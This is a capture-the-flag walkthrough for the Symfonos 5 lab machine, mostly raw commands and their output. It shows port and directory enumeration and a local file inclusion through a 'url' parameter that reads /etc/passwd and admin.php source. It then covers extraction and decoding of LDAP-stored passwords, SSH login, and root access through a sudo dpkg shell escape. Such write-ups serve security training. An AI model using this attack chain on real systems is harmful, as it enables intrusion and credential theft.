Symfonos 5
Nmap scan for open ports + services
``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) | ssh-hostkey: | 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA) | 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA) |_ 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X 636/tcp open ldapssl? MAC Address: 00:0C:29:24:4D:63 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ```
Webserver first
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5] └─$ gobuster dir -u http://192.168.58.136 -x php,html -r -f -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.58.136 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: php,html [+] Add Slash: true [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2021/04/30 22:21:49 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 207] /home.php (Status: 200) [Size: 1650] /icons/ (Status: 403) [Size: 279] /static/ (Status: 200) [Size: 1745] /admin.php (Status: 200) [Size: 1650] /logout.php (Status: 200) [Size: 1650] /portraits.php (Status: 200) [Size: 165] /server-status/ (Status: 403) [Size: 279] =============================================================== 2021/04/30 22:23:37 Finished =============================================================== ```
`/home.php` is redirected to `/admin.php`
response in burpsuite from home.php
``` HTTP/1.1 302 Found Date: Sat, 01 May 2021 08:34:16 GMT Server: Apache/2.4.29 (Ubuntu) Set-Cookie: PHPSESSID=4sghjkemg8h2cq6dvuo5tn3quv; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: admin.php Content-Length: 962 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <link rel="stylesheet" type="text/css" href="/static/bootstrap.min.css"> </head> <body> <nav class="navbar navbar-expand-lg navbar-dark bg-dark"> <a class="navbar-brand" href="home.php">symfonos</a> <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor02" aria-controls="navbarColor02" aria-expanded="false" aria-label="Toggle navigation"> <span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarColor02"> <ul class="navbar-nav mr-auto"> <li class="nav-item"> <a class="nav-link" href="home.php">Home</a> </li> <li class="nav-item"> <a class="nav-link" href="home.php?url=http://127.0.0.1/portraits.php">Portraits</a> </li> <li class="nav-item"> <a class="nav-link" href="logout.php">Logout</a> </li> </ul> </div> </nav><br /> <center> <h3>Under Developement</h3></center> </body> ```
A parameter (`url`) which can be used for local file inclusion (LFI).
Trying to read some local files, like `/etc/passwd`
``` GET /home.php?url=/etc/passwd HTTP/1.1 Host: 192.168.58.136 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ```
Result:
``` root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin ```
This works, so trying for the `admin.php` file
``` GET /home.php?url=/var/www/html/admin.php HTTP/1.1 Host: 192.168.58.136 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 ```
Result:
```
<?php
session_start();
if(isset($_SESSION["loggedin"]) && $_SESSION["loggedin"] === true){
header("location: home.php");
exit;
}
function authLdap($username, $password) {
$ldap_ch = ldap_connect("ldap://172.18.0.22");
ldap_set_option($ldap_ch, LDAP_OPT_PROTOCOL_VERSION, 3);
if (!$ldap_ch) {
return FALSE;
}
$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
if (!$bind) {
return FALSE;
}
$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);
if (!$result) {
return FALSE;
}
$info = ldap_get_entries($ldap_ch, $result);
if (!($info) || ($info["count"] == 0)) {
return FALSE;
}
return TRUE;
}
if(isset($_GET['username']) && isset($_GET['password'])){
$username = urldecode($_GET['username']);
$password = urldecode($_GET['password']);
$bIsAuth = authLdap($username, $password);
if (! $bIsAuth ) {
$msg = "Invalid login";
} else {
$_SESSION["loggedin"] = true;
header("location: home.php");
exit;
}
}
?>
```
Useful information for ldap
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5] └─$ ldapsearch -h 192.168.58.136 -p 389 -b "dc=symfonos,dc=local" -w "qMDdyZh3cT6eeAWD" -D "cn=admin,dc=symfonos,dc=local" # extended LDIF # # LDAPv3 # base <dc=symfonos,dc=local> with scope subtree # filter: (objectclass=*) # requesting: ALL # # symfonos.local dn: dc=symfonos,dc=local objectClass: top objectClass: dcObject objectClass: organization o: symfonos dc: symfonos # admin, symfonos.local dn: cn=admin,dc=symfonos,dc=local objectClass: simpleSecurityObject objectClass: organizationalRole cn: admin description: LDAP administrator userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0= # zeus, symfonos.local dn: uid=zeus,dc=symfonos,dc=local uid: zeus cn: zeus sn: 3 objectClass: top objectClass: posixAccount objectClass: inetOrgPerson loginShell: /bin/bash homeDirectory: /home/zeus uidNumber: 14583102 gidNumber: 14564100 userPassword:: Y2V0a0tmNHdDdUhDOUZFVA== mail: zeus@symfonos.local gecos: Zeus User # search result search: 2 result: 0 Success # numResponses: 4 # numEntries: 3 ```
Credentials (base64 encoded)
```
┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5]
└─$ echo "e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=" | base64 -d
{SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm
```
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5] └─$ echo "Y2V0a0tmNHdDdUhDOUZFVA==" | base64 -d cetkKf4wCuHC9FET ```
``` ┌──(n0w4n㉿cyberlab)-[~/ctf/symfonos5] └─$ ssh zeus@192.168.58.136 The authenticity of host '192.168.58.136 (192.168.58.136)' can't be established. ECDSA key fingerprint is SHA256:0LrOVGfXWfj1Vtdo1krp85ZDlnsb3DDJFap9cOF5WoA. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.58.136' (ECDSA) to the list of known hosts. zeus@192.168.58.136's password: Permission denied, please try again. zeus@192.168.58.136's password: Linux symfonos5 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Mon Jan 6 18:27:11 2020 from 192.168.65.128 zeus@symfonos5:~$ id uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev) ```
``` zeus@symfonos5:~$ sudo -l Matching Defaults entries for zeus on symfonos5: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User zeus may run the following commands on symfonos5: (root) NOPASSWD: /usr/bin/dpkg ```
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access (source = https://gtfobins.github.io/gtfobins/dpkg/)
``` zeus@symfonos5:~$ sudo dpkg -l ...[SNIP]... ii file 1:5.35-4+deb10u1 amd64 Recognize the type of data in a file using "magic" numbers !/bin/sh # id uid=0(root) gid=0(root) groups=0(root) ```
Root acces. Final part.
# cat /root/proof.txt
Congrats on rooting symfonos:5!
ZEUS
* . dZZZZZ, . *
dZZZZ ZZ,
* . ,AZZZZZZZZZZZ `ZZ,_ *
,ZZZZZZV' ZZZZ `Z,`\
,ZZZ ZZ . ZZZZ `V
* ZZZZV' ZZ ZZZZ \_ .
. V l . ZZ ZZZZZZ .
l \ ZZ, ZZZ ZZZZZZ,
. / ZZ l ZZZ ZZZ `Z,
ZZ l ZZZ Z Z, `Z, *
. ZZ ZZZ Z Z, `l
Z ZZ V `Z \
V ZZC l V
Z l V ZR l .
\ \ l ZA
\ C C
\ K / / K
A \ \ | / / /
\ \\|/ / /
__________________________________\|/_________________________
Contact me via Twitter @zayotic to give feedback!
#